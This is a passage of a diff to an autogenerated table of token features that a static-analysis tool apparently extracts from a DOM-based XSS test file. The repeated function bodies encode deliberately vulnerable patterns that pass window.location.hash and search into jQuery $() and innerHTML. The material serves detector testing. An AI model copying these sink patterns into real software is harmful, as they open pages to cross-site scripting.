    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:28:5:28:43 | exceptional return of window. ... ?', '') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:28:5:28:43 | exceptional return of window. ... ?', '') | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:28:5:28:43 | window. ... ?', '') | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/jquery.js:28:5:28:43 | window. ... ?', '') | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/jquery.js:28:5:28:43 | window. ... ?', '') | contextFunctionInterfaces | test() | @@ -14048,6 +103072,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jquery.js:28:5:28:43 | window. ... ?', '') | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | | autogenerated/Xss/DomBasedXss/jquery.js:28:5:28:43 | window. ... ?', '') | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/jquery.js:28:5:28:43 | window. ... ?', '') | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:28:12:28:19 | location | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:28:12:28:19 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:28:12:28:19 | location | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:28:12:28:19 | location | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:28:12:28:19 | location | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:28:21:28:26 | search | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:28:21:28:26 | search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:28:21:28:26 | search | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:28:21:28:26 | search | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:28:21:28:26 | search | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:28:28:28:34 | replace | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:28:28:28:34 | replace | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:28:28:28:34 | replace | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:28:28:28:34 | replace | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:28:28:28:34 | replace | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:28:36:28:38 | '?' | CalleeFlexibleAccessPath | window.location.search.replace | | autogenerated/Xss/DomBasedXss/jquery.js:28:36:28:38 | '?' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/jquery.js:28:36:28:38 | '?' | contextFunctionInterfaces | test() | @@ -14062,6 +103101,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jquery.js:28:41:28:42 | '' | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | | autogenerated/Xss/DomBasedXss/jquery.js:28:41:28:42 | '' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/jquery.js:28:41:28:42 | '' | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:29:3:29:3 | $ | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:29:3:29:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:29:3:29:3 | $ | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:29:3:29:3 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:29:3:29:3 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:29:3:29:26 | $(hash. ... ', '')) | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:29:3:29:26 | $(hash. ... ', '')) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:29:3:29:26 | $(hash. ... ', '')) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:29:3:29:26 | $(hash. ... ', '')) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:29:3:29:26 | $(hash. ... ', '')) | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:29:3:29:26 | exceptional return of $(hash. ... ', '')) | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:29:3:29:26 | exceptional return of $(hash. ... ', '')) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jquery.js:29:3:29:26 | exceptional return of $(hash. ... ', '')) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:29:3:29:26 | exceptional return of $(hash. ... ', '')) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:29:3:29:26 | exceptional return of $(hash. ... ', '')) | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:29:5:29:8 | hash | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:29:5:29:8 | hash | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:29:5:29:8 | hash | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:29:5:29:8 | hash | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:29:5:29:8 | hash | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:29:5:29:16 | hash.replace | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:29:5:29:16 | hash.replace | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:29:5:29:16 | hash.replace | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:29:5:29:16 | hash.replace | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:29:5:29:16 | hash.replace | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:29:5:29:25 | exceptional return of hash.re ... !', '') | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:29:5:29:25 | exceptional return of hash.re ... !', '') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jquery.js:29:5:29:25 | exceptional return of hash.re ... !', '') | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:29:5:29:25 | exceptional return of hash.re ... !', '') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:29:5:29:25 | exceptional return of hash.re ... !', '') | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:29:5:29:25 | hash.re ... !', '') | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/jquery.js:29:5:29:25 | hash.re ... !', '') | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/jquery.js:29:5:29:25 | hash.re ... !', '') | contextFunctionInterfaces | test() | @@ -14069,6 +103138,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jquery.js:29:5:29:25 | hash.re ... !', '') | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | | autogenerated/Xss/DomBasedXss/jquery.js:29:5:29:25 | hash.re ... !', '') | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/jquery.js:29:5:29:25 | hash.re ... !', '') | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:29:10:29:16 | replace | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:29:10:29:16 | replace | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:29:10:29:16 | replace | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:29:10:29:16 | replace | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:29:10:29:16 | replace | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:29:18:29:20 | '!' | CalleeFlexibleAccessPath | hash.replace | | autogenerated/Xss/DomBasedXss/jquery.js:29:18:29:20 | '!' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/jquery.js:29:18:29:20 | '!' | contextFunctionInterfaces | test() | @@ -14085,6 +103159,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jquery.js:29:23:29:24 | '' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/jquery.js:29:23:29:24 | '' | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:29:23:29:24 | '' | receiverName | hash | +| autogenerated/Xss/DomBasedXss/jquery.js:30:3:30:3 | $ | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:30:3:30:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:30:3:30:3 | $ | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:30:3:30:3 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:30:3:30:3 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:30:3:30:29 | $(hash. ... ', '')) | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:30:3:30:29 | $(hash. ... ', '')) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:30:3:30:29 | $(hash. ... ', '')) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:30:3:30:29 | $(hash. ... ', '')) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:30:3:30:29 | $(hash. ... ', '')) | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:30:3:30:29 | exceptional return of $(hash. ... ', '')) | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:30:3:30:29 | exceptional return of $(hash. ... ', '')) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jquery.js:30:3:30:29 | exceptional return of $(hash. ... ', '')) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:30:3:30:29 | exceptional return of $(hash. ... ', '')) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:30:3:30:29 | exceptional return of $(hash. ... ', '')) | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:30:5:30:8 | hash | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:30:5:30:8 | hash | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:30:5:30:8 | hash | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:30:5:30:8 | hash | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:30:5:30:8 | hash | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:30:5:30:16 | hash.replace | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:30:5:30:16 | hash.replace | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:30:5:30:16 | hash.replace | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:30:5:30:16 | hash.replace | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:30:5:30:16 | hash.replace | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:30:5:30:28 | exceptional return of hash.re ... h', '') | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:30:5:30:28 | exceptional return of hash.re ... h', '') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jquery.js:30:5:30:28 | exceptional return of hash.re ... h', '') | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:30:5:30:28 | exceptional return of hash.re ... h', '') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:30:5:30:28 | exceptional return of hash.re ... h', '') | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:30:5:30:28 | hash.re ... h', '') | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/jquery.js:30:5:30:28 | hash.re ... h', '') | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/jquery.js:30:5:30:28 | hash.re ... h', '') | contextFunctionInterfaces | test() | @@ -14092,6 +103196,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jquery.js:30:5:30:28 | hash.re ... h', '') | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | | autogenerated/Xss/DomBasedXss/jquery.js:30:5:30:28 | hash.re ... h', '') | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/jquery.js:30:5:30:28 | hash.re ... h', '') | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:30:10:30:16 | replace | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:30:10:30:16 | replace | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:30:10:30:16 | replace | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:30:10:30:16 | replace | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:30:10:30:16 | replace | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:30:18:30:23 | 'blah' | CalleeFlexibleAccessPath | hash.replace | | autogenerated/Xss/DomBasedXss/jquery.js:30:18:30:23 | 'blah' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/jquery.js:30:18:30:23 | 'blah' | contextFunctionInterfaces | test() | @@ -14108,6 +103217,27 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jquery.js:30:26:30:27 | '' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/jquery.js:30:26:30:27 | '' | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:30:26:30:27 | '' | receiverName | hash | +| autogenerated/Xss/DomBasedXss/jquery.js:32:3:32:3 | $ | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:32:3:32:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:32:3:32:3 | $ | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:32:3:32:3 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:32:3:32:3 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:32:3:32:18 | $(hash + 'blah') | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:32:3:32:18 | $(hash + 'blah') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:32:3:32:18 | $(hash + 'blah') | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:32:3:32:18 | $(hash + 'blah') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:32:3:32:18 | $(hash + 'blah') | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:32:3:32:18 | exceptional return of $(hash + 'blah') | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:32:3:32:18 | exceptional return of $(hash + 'blah') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jquery.js:32:3:32:18 | exceptional return of $(hash + 'blah') | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:32:3:32:18 | exceptional return of $(hash + 'blah') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:32:3:32:18 | exceptional return of $(hash + 'blah') | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:32:5:32:8 | hash | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:32:5:32:8 | hash | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:32:5:32:8 | hash | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:32:5:32:8 | hash | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:32:5:32:8 | hash | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:32:5:32:8 | hash | stringConcatenatedWith | -endpoint- 'blah' | | autogenerated/Xss/DomBasedXss/jquery.js:32:5:32:17 | hash + 'blah' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/jquery.js:32:5:32:17 | hash + 'blah' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/jquery.js:32:5:32:17 | hash + 'blah' | contextFunctionInterfaces | test() | @@ -14115,6 +103245,33 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jquery.js:32:5:32:17 | hash + 'blah' | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | | autogenerated/Xss/DomBasedXss/jquery.js:32:5:32:17 | hash + 'blah' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/jquery.js:32:5:32:17 | hash + 'blah' | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:32:12:32:17 | 'blah' | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:32:12:32:17 | 'blah' | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:32:12:32:17 | 'blah' | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
